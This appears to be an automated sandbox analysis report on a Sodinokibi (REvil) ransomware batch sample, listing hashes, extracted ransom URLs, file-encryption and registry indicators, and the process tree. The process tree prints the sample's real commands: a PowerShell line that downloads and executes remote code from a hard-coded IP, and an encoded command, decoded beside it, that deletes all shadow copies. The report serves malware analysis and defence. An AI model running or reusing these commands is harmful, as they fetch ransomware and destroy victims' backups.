Analysis
-
max time kernel: 85s
max time network: 88s
platform: windows10_x64
resource: win10v200722
submitted: 12-08-2020 07:10
Static task: static1
Behavioral task: behavioral1
  Sample: 16158bc1db4ba8fb8e9a13c34c8a51e1.bat
  Resource: win7
Behavioral task: behavioral2
  Sample: 16158bc1db4ba8fb8e9a13c34c8a51e1.bat
  Resource: win10v200722
General
-
Target: 16158bc1db4ba8fb8e9a13c34c8a51e1.bat
Size: 216B
MD5: bf75953509fd375616976c6eb6f30aff
SHA1: 3bf54cce4abd3c3434b7073e4ebe0f480295923c
SHA256: 5edd7915fd9b57f2643fe8abf646344fccd2efc98d4dcbeab47659b14f59feb4
SHA512: 8362b4f7c808e754bb468b31140b3ec023527e468ec8a9171111f77e39c55a8b04cc3442bc4c334a3cce25e90b9ce5cd14842d7cbd66fef8d6051d02f8e953f9
Malware Config
Extracted: http://185.103.242.78/pastes/16158bc1db4ba8fb8e9a13c34c8a51e1
Extracted: C:\4v057e0-readme.txt
Family: sodinokibi
URLs:
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/71D027CBC5483D95
  http://decryptor.cc/71D027CBC5483D95
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes: powershell.exe
  flow | pid | process
  1 | 3880 | powershell.exe
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes: powershell.exe
  description | ioc | process
  File opened for modification | \??\c:\users\admin\pictures\ConvertFromClose.tiff | powershell.exe
  File opened for modification | \??\c:\users\admin\pictures\MergeRedo.tiff | powershell.exe
  File renamed | C:\Users\Admin\Pictures\ConvertFromClose.tiff => \??\c:\users\admin\pictures\ConvertFromClose.tiff.4v057e0 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\RegisterConvertFrom.png => \??\c:\users\admin\pictures\RegisterConvertFrom.png.4v057e0 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\StartEnter.png => \??\c:\users\admin\pictures\StartEnter.png.4v057e0 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\MergeRedo.tiff => \??\c:\users\admin\pictures\MergeRedo.tiff.4v057e0 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\BackupUnregister.crw => \??\c:\users\admin\pictures\BackupUnregister.crw.4v057e0 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\SaveSubmit.png => \??\c:\users\admin\pictures\SaveSubmit.png.4v057e0 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\SearchPop.crw => \??\c:\users\admin\pictures\SearchPop.crw.4v057e0 | powershell.exe
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\535qwwk.bmp" | powershell.exe
-
Drops file in Program Files directory 34 IoCs
Processes: powershell.exe
  description | ioc | process
  File opened for modification | \??\c:\program files\ConvertToUse.ini | powershell.exe
  File opened for modification | \??\c:\program files\SaveSwitch.mht | powershell.exe
  File opened for modification | \??\c:\program files\UnblockPop.jpe | powershell.exe
  File opened for modification | \??\c:\program files\UseEnable.7z | powershell.exe
  File opened for modification | \??\c:\program files\SubmitEdit.pptx | powershell.exe
  File created | \??\c:\program files\4v057e0-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\GrantPush.fon | powershell.exe
  File opened for modification | \??\c:\program files\MergeInitialize.xml | powershell.exe
  File opened for modification | \??\c:\program files\ProtectPublish.rm | powershell.exe
  File opened for modification | \??\c:\program files\GroupOptimize.dwg | powershell.exe
  File opened for modification | \??\c:\program files\NewRemove.mp2v | powershell.exe
  File opened for modification | \??\c:\program files\RestartGrant.m4a | powershell.exe
  File opened for modification | \??\c:\program files\RestartPing.mht | powershell.exe
  File opened for modification | \??\c:\program files\ImportAdd.i64 | powershell.exe
  File opened for modification | \??\c:\program files\LockOpen.pps | powershell.exe
  File opened for modification | \??\c:\program files\WaitGrant.wm | powershell.exe
  File opened for modification | \??\c:\program files\RestartSearch.mht | powershell.exe
  File created | \??\c:\program files (x86)\4v057e0-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\ClearRedo.mpeg3 | powershell.exe
  File opened for modification | \??\c:\program files\MeasureRead.mpeg | powershell.exe
  File opened for modification | \??\c:\program files\PopRedo.midi | powershell.exe
  File opened for modification | \??\c:\program files\SyncMeasure.ex_ | powershell.exe
  File opened for modification | \??\c:\program files\TraceClear.reg | powershell.exe
  File opened for modification | \??\c:\program files\TraceEnter.bmp | powershell.exe
  File opened for modification | \??\c:\program files\UndoExpand.ppt | powershell.exe
  File opened for modification | \??\c:\program files\AddSend.wvx | powershell.exe
  File opened for modification | \??\c:\program files\ExitSplit.vsdx | powershell.exe
  File opened for modification | \??\c:\program files\FindConvertTo.ADTS | powershell.exe
  File opened for modification | \??\c:\program files\ResetUse.mpeg | powershell.exe
  File opened for modification | \??\c:\program files\BackupUnlock.xml | powershell.exe
  File opened for modification | \??\c:\program files\LimitShow.ods | powershell.exe
  File opened for modification | \??\c:\program files\OptimizeRead.vst | powershell.exe
  File opened for modification | \??\c:\program files\SubmitOptimize.tif | powershell.exe
  File opened for modification | \??\c:\program files\EditMount.xsl | powershell.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes: powershell.exe, powershell.exe
  pid | process
  3880 | powershell.exe
  3880 | powershell.exe
  3880 | powershell.exe
  3880 | powershell.exe
  3880 | powershell.exe
  3968 | powershell.exe
  3968 | powershell.exe
  3968 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes: powershell.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 3880 | powershell.exe
  Token: SeDebugPrivilege | 3880 | powershell.exe
  Token: SeDebugPrivilege | 3968 | powershell.exe
  Token: SeBackupPrivilege | 352 | vssvc.exe
  Token: SeRestorePrivilege | 352 | vssvc.exe
  Token: SeAuditPrivilege | 352 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 3880 | powershell.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes: cmd.exe, powershell.exe
  description | pid | process | target process
  PID 964 wrote to memory of 3880 | 964 | cmd.exe | powershell.exe
  PID 964 wrote to memory of 3880 | 964 | cmd.exe | powershell.exe
  PID 964 wrote to memory of 3880 | 964 | cmd.exe | powershell.exe
  PID 3880 wrote to memory of 3968 | 3880 | powershell.exe | powershell.exe
  PID 3880 wrote to memory of 3968 | 3880 | powershell.exe | powershell.exe
  PID 3880 wrote to memory of 3968 | 3880 | powershell.exe | powershell.exe
Processes
-
C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\16158bc1db4ba8fb8e9a13c34c8a51e1.bat"
  - Suspicious use of WriteProcessMemory
  PID:964
  -
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/16158bc1db4ba8fb8e9a13c34c8a51e1');Invoke-ZOPUSYDNI;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3880
    -
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded -e argument (base64 of UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:3968
-
C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
  PID:352